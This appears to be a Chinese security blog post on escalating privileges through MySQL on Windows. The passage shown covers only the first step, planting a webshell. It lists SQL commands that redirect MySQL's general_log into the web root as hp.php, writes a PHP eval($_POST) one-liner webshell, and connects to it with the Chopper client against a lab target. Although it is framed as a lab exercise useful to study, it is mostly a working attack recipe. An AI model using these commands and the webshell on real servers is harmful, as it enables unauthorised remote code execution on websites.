Windows下MySql提权分析

  • A+
所属分类:网络安全文章
阿里代金券


推广者专属福利,新客户无门槛领取总价值高达2775元代金券,每种代金券限量500张,先到先得。

写在前面的废话(忽略)

这篇文章是写基于windows环境下的一些mysql提权方法的分析并利用。这些方法老生常谈,但困于很多文章在讲分析和利用的时候模棱两可,因此想总结一下常见的方法思路。基于windows的提权姿势多的数不胜数,一般在配置文件可以嗅探到root密码的情况(root密码已知)下,或者注入、爆破拿到root密码下,可以考虑mysql提权。文章内容很基础,下面对这些方法进行一些粗谈!

实验环境

靶机A: Windows 7 SP1
靶机B: Windows server 2003 enterprise x64
Phpstudy搭建的php+mysql
php版本:5.4.45
mysql版本:5.5.53
攻击环境:已知root账号密码,网站存在phpmyadmin页面

通过phpmyadmin来getshell

简单测试
利用log变量,猜一下绝对路径

Windows下MySql提权分析

看到phpstudy,猜测根目录在WWW下,into outfile写个马测一下能传不

Windows下MySql提权分析

果然是用不成into outfile,因为file_priv为null,那么尝试使用日志写马

利用日志写shell

开启日志记录

  1. set global general_log='on';

日志文件导出指定目录

  1. set global general_log_file='C:/phpstudy/WWW/hp.php';

记录sql语句写马,这里我就是演示一下,没有安全狗,直接传原马

  1. select '<?php @eval($_POST["hp"]); ?>';

关闭记录

  1. set global general_log=off;

菜刀连接

  1. url: 192.168.11.106/hp.php

Windows下MySql提权分析

看一下权限,普通成员hpd0egr,创建用户错误5。接下来开始提权之路!

CE安全网

发表评论

您必须登录才能发表评论!